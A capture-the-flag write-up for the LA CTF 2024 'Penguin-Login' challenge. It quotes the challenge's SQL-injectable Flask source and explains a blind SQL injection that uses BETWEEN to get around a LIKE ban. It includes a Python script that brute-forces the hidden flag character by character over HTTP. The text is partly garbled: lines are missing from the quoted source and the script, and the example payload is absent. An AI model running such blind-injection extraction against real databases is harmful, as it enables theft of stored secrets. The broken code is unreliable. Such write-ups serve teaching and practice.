Penguin-Login [LA CTF 2024]

writeup by: H0N3YP0T

Challenge Description

I got tired of people leaking my password from the db so I moved it out of the db.


The website is really basic, it only does one request which is vulnerable to SQL injections.




By looking in the source code, I notice that the original query is "SELECT * FROM penguins WHERE name = '%s'" but the tricky part is that a whitelist of characters is used to filter the input. I can not use the word LIKE and I can use only a-zA-Z0-9 and {_} characters.

with app.app_context():
    conn = get_database_connection()
    create_sql = """
        DROP TABLE IF EXISTS penguins;
        CREATE TABLE IF NOT EXISTS penguins (
            name TEXT
    with conn.cursor() as curr:
        curr.execute("SELECT COUNT(*) FROM penguins")
        if curr.fetchall()[0][0] == 0:
            curr.execute("INSERT INTO penguins (name) VALUES ('peng')")
            curr.execute("INSERT INTO penguins (name) VALUES ('emperor')")
            curr.execute("INSERT INTO penguins (name) VALUES ('%s')" % (flag))
def submit_form():
    conn = None
        username = request.form["username"]
        conn = get_database_connection()

        assert all(c in allowed_chars for c in username), "no character for u uwu"
        assert all(
            forbidden not in username.lower() for forbidden in forbidden_strs
        ), "no word for u uwu"

        with conn.cursor() as curr:
            curr.execute("SELECT * FROM penguins WHERE name = '%s'" % username)
            result = curr.fetchall()

        if len(result):
            return "We found a penguin!!!!!", 200
        return "No penguins sadg", 201

    except Exception as e:
        return f"Error: {str(e)}", 400

The server does not send the query back, it only sends a message if the query was successful or not. Therefore I need to build an error based SQLi. I can use the BETWEEN query in order to simulate the LIKE query. The following payload is used to guess one by one character of the flag.


This payload is an example where I already know the beginning of the flag (flag{tes) and I want to find out the next character. I use the BETWEEN query to check if the character I will inject in the first position of the flag is correct or not. If the server returns We found a penguin!!!!! then the character is good otherwise it is not. Note that I had z at the end of the second part of the BETWEEN to check from a to z and if it is a number then I will add 9 to check from 0 to 9. In order to be faster I can use fuff to fuzz every character by using a wordlist.


or even do it by using a script (thanks to MettleSphee)

import requests
url = ""

headers = {
  'Content-Type': 'application/x-www-form-urlencoded'
alphabet = '0123456789qwertyuiopasdfghjklzxcvbnm}'
while found_string[len(found_string)-1] != "}":
	if (found == 1):
	for brute in alphabet:
		payload = 'username=\'%20UNION%20SELECT%20name%20from%20penguins%20WHERE%20NAME%20BETWEEN%20\''+found_string+brute+'\'%20AND%20\''+found_string+brute+'z'
		response = requests.request("POST", url, headers=headers, data=payload)
		match response.status_code:
			case 201:
				#print("not found yet")
				if (brute=="}"):
					found = 1
			case 200:
				found_string = found_string + brute
				if (brute=="}"):
					found = 1
print("Found! "+found_string)


For some reason the flag in the exploit does not contain any _ character but the flag we have to submit contains it between the different words which is absolutely demonic. I had a lot of trouble to understand the meaning of the flag and put the _ at the right place 😡, like, seriously am I the only one who got troubles to understand this 90stgr353sn0tl7k3th30th3rdbs0w0 ???

